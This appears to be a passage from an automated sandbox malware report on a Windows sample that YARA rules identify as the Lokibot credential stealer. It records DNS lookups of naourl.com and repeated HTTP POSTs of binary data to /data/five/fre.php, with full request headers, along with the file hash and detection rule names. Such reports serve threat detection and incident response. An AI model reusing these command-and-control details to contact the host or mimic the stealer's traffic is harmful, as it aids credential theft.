                        Dec 4, 2021 23:40:27.815903902 CET8049766212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:27.816095114 CET4976680192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:27.827552080 CET8049766212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:27.827702045 CET4976680192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:27.827722073 CET8049766212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:27.827779055 CET4976680192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:27.853832006 CET8049766212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:28.797764063 CET4976780192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:28.823947906 CET8049767212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:28.824559927 CET4976780192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:28.827279091 CET4976780192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:28.853244066 CET8049767212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:28.856611013 CET4976780192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:28.868113041 CET8049767212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:28.868171930 CET8049767212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:28.868345022 CET4976780192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:28.868428946 CET4976780192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:28.894344091 CET8049767212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:29.819633961 CET4976880192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:29.845372915 CET8049768212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:29.845504045 CET4976880192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:29.848169088 CET4976880192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:29.873876095 CET8049768212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:29.874062061 CET4976880192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:29.886748075 CET8049768212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:29.886892080 CET4976880192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:29.887314081 CET8049768212.32.237.90192.168.2.4
                        Dec 4, 2021 23:40:29.887382030 CET4976880192.168.2.4212.32.237.90
                        Dec 4, 2021 23:40:29.912643909 CET8049768212.32.237.90192.168.2.4

                        UDP Packets

                        TimestampSource PortDest PortSource IPDest IP
                        Dec 4, 2021 23:40:25.106108904 CET6454953192.168.2.48.8.8.8
                        Dec 4, 2021 23:40:25.134881973 CET53645498.8.8.8192.168.2.4
                        Dec 4, 2021 23:40:26.530941963 CET6315353192.168.2.48.8.8.8
                        Dec 4, 2021 23:40:26.550316095 CET53631538.8.8.8192.168.2.4
                        Dec 4, 2021 23:40:27.739684105 CET5299153192.168.2.48.8.8.8
                        Dec 4, 2021 23:40:27.760241985 CET53529918.8.8.8192.168.2.4
                        Dec 4, 2021 23:40:28.773323059 CET5370053192.168.2.48.8.8.8
                        Dec 4, 2021 23:40:28.793174028 CET53537008.8.8.8192.168.2.4
                        Dec 4, 2021 23:40:29.799994946 CET5172653192.168.2.48.8.8.8
                        Dec 4, 2021 23:40:29.817958117 CET53517268.8.8.8192.168.2.4

                        DNS Queries

                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                        Dec 4, 2021 23:40:25.106108904 CET192.168.2.48.8.8.80x905aStandard query (0)naourl.comA (IP address)IN (0x0001)
                        Dec 4, 2021 23:40:26.530941963 CET192.168.2.48.8.8.80x60daStandard query (0)naourl.comA (IP address)IN (0x0001)
                        Dec 4, 2021 23:40:27.739684105 CET192.168.2.48.8.8.80xd8e0Standard query (0)naourl.comA (IP address)IN (0x0001)
                        Dec 4, 2021 23:40:28.773323059 CET192.168.2.48.8.8.80x48faStandard query (0)naourl.comA (IP address)IN (0x0001)
                        Dec 4, 2021 23:40:29.799994946 CET192.168.2.48.8.8.80x402aStandard query (0)naourl.comA (IP address)IN (0x0001)

                        DNS Answers

                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                        Dec 4, 2021 23:40:25.134881973 CET8.8.8.8192.168.2.40x905aNo error (0)naourl.com212.32.237.90A (IP address)IN (0x0001)
                        Dec 4, 2021 23:40:26.550316095 CET8.8.8.8192.168.2.40x60daNo error (0)naourl.com212.32.237.90A (IP address)IN (0x0001)
                        Dec 4, 2021 23:40:27.760241985 CET8.8.8.8192.168.2.40xd8e0No error (0)naourl.com212.32.237.90A (IP address)IN (0x0001)
                        Dec 4, 2021 23:40:28.793174028 CET8.8.8.8192.168.2.40x48faNo error (0)naourl.com212.32.237.90A (IP address)IN (0x0001)
                        Dec 4, 2021 23:40:29.817958117 CET8.8.8.8192.168.2.40x402aNo error (0)naourl.com212.32.237.90A (IP address)IN (0x0001)

                        HTTP Request Dependency Graph

                        • naourl.com

                        HTTP Packets

                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        0192.168.2.449752212.32.237.9080C:\Users\user\Desktop\rfxJzZjiWv.exe
                        TimestampkBytes transferredDirectionData
                        Dec 4, 2021 23:40:25.169298887 CET540OUTPOST /data/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: naourl.com
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 7B0651A2
                        Content-Length: 190
                        Connection: close
                        Dec 4, 2021 23:40:25.426904917 CET667INHTTP/1.1 302 Found
                        cache-control: max-age=0, private, must-revalidate
                        connection: close
                        content-length: 11
                        date: Sat, 04 Dec 2021 22:40:25 GMT
                        location: http://survey-smiles.com
                        server: nginx
                        set-cookie: sid=2c169730-5553-11ec-a6f5-1bd523c5916e; path=/; domain=.naourl.com; expires=Fri, 23 Dec 2089 01:54:32 GMT; max-age=2147483647; HttpOnly
                        Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                        Data Ascii: Redirecting


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        1192.168.2.449765212.32.237.9080C:\Users\user\Desktop\rfxJzZjiWv.exe
                        TimestampkBytes transferredDirectionData
                        Dec 4, 2021 23:40:26.584317923 CET1166OUTPOST /data/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: naourl.com
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 7B0651A2
                        Content-Length: 190
                        Connection: close
                        Dec 4, 2021 23:40:26.847377062 CET1167INHTTP/1.1 302 Found
                        cache-control: max-age=0, private, must-revalidate
                        connection: close
                        content-length: 11
                        date: Sat, 04 Dec 2021 22:40:26 GMT
                        location: http://survey-smiles.com
                        server: nginx
                        set-cookie: sid=2cf1b194-5553-11ec-a729-1bd5acd08a42; path=/; domain=.naourl.com; expires=Fri, 23 Dec 2089 01:54:33 GMT; max-age=2147483647; HttpOnly
                        Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                        Data Ascii: Redirecting


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        2192.168.2.449766212.32.237.9080C:\Users\user\Desktop\rfxJzZjiWv.exe
                        TimestampkBytes transferredDirectionData
                        Dec 4, 2021 23:40:27.790426016 CET1168OUTPOST /data/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: naourl.com
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 7B0651A2
                        Content-Length: 163
                        Connection: close
                        Dec 4, 2021 23:40:27.827552080 CET1168INHTTP/1.1 302 Found
                        cache-control: max-age=0, private, must-revalidate
                        connection: close
                        content-length: 11
                        date: Sat, 04 Dec 2021 22:40:27 GMT
                        location: http://survey-smiles.com
                        server: nginx
                        set-cookie: sid=2da4e8c2-5553-11ec-baa8-1bd5fde30033; path=/; domain=.naourl.com; expires=Fri, 23 Dec 2089 01:54:34 GMT; max-age=2147483647; HttpOnly
                        Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                        Data Ascii: Redirecting


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        3192.168.2.449767212.32.237.9080C:\Users\user\Desktop\rfxJzZjiWv.exe
                        TimestampkBytes transferredDirectionData
                        Dec 4, 2021 23:40:28.827279091 CET1169OUTPOST /data/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: naourl.com
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 7B0651A2
                        Content-Length: 163
                        Connection: close
                        Dec 4, 2021 23:40:28.868113041 CET1170INHTTP/1.1 302 Found
                        cache-control: max-age=0, private, must-revalidate
                        connection: close
                        content-length: 11
                        date: Sat, 04 Dec 2021 22:40:28 GMT
                        location: http://survey-smiles.com
                        server: nginx
                        set-cookie: sid=2e4366f0-5553-11ec-96cd-1bd532dae4ba; path=/; domain=.naourl.com; expires=Fri, 23 Dec 2089 01:54:35 GMT; max-age=2147483647; HttpOnly
                        Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                        Data Ascii: Redirecting


                        Session IDSource IPSource PortDestination IPDestination PortProcess
                        4192.168.2.449768212.32.237.9080C:\Users\user\Desktop\rfxJzZjiWv.exe
                        TimestampkBytes transferredDirectionData
                        Dec 4, 2021 23:40:29.848169088 CET1171OUTPOST /data/five/fre.php HTTP/1.0
                        User-Agent: Mozilla/4.08 (Charon; Inferno)
                        Host: naourl.com
                        Accept: */*
                        Content-Type: application/octet-stream
                        Content-Encoding: binary
                        Content-Key: 7B0651A2
                        Content-Length: 163
                        Connection: close
                        Dec 4, 2021 23:40:29.886748075 CET1171INHTTP/1.1 302 Found
                        cache-control: max-age=0, private, must-revalidate
                        connection: close
                        content-length: 11
                        date: Sat, 04 Dec 2021 22:40:29 GMT
                        location: http://survey-smiles.com
                        server: nginx
                        set-cookie: sid=2edefc6e-5553-11ec-a477-1bd561088fd5; path=/; domain=.naourl.com; expires=Fri, 23 Dec 2089 01:54:36 GMT; max-age=2147483647; HttpOnly
                        Data Raw: 52 65 64 69 72 65 63 74 69 6e 67
                        Data Ascii: Redirecting


                        Code Manipulations

                        Statistics

                        System Behavior

                        General

                        Start time:23:40:22
                        Start date:04/12/2021
                        Path:C:\Users\user\Desktop\rfxJzZjiWv.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Users\user\Desktop\rfxJzZjiWv.exe"
                        Imagebase:0x400000
                        File size:106496 bytes
                        MD5 hash:8ED7E6B478CF0C00934BB42E3BDF5E20
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000002.662501155.0000000000415000.00000002.00020000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000000.645669374.0000000000415000.00000002.00020000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_aPLib_compressed_binary, Description: Yara detected aPLib compressed binary, Source: 00000000.00000000.645669374.0000000000415000.00000002.00020000.sdmp, Author: Joe Security
                        • Rule: JoeSecurity_Lokibot, Description: Yara detected Lokibot, Source: 00000000.00000000.645669374.0000000000415000.00000002.00020000.sdmp, Author: Joe Security
                        Reputation:low

                        Disassembly

                        Code Analysis

                        Reset < >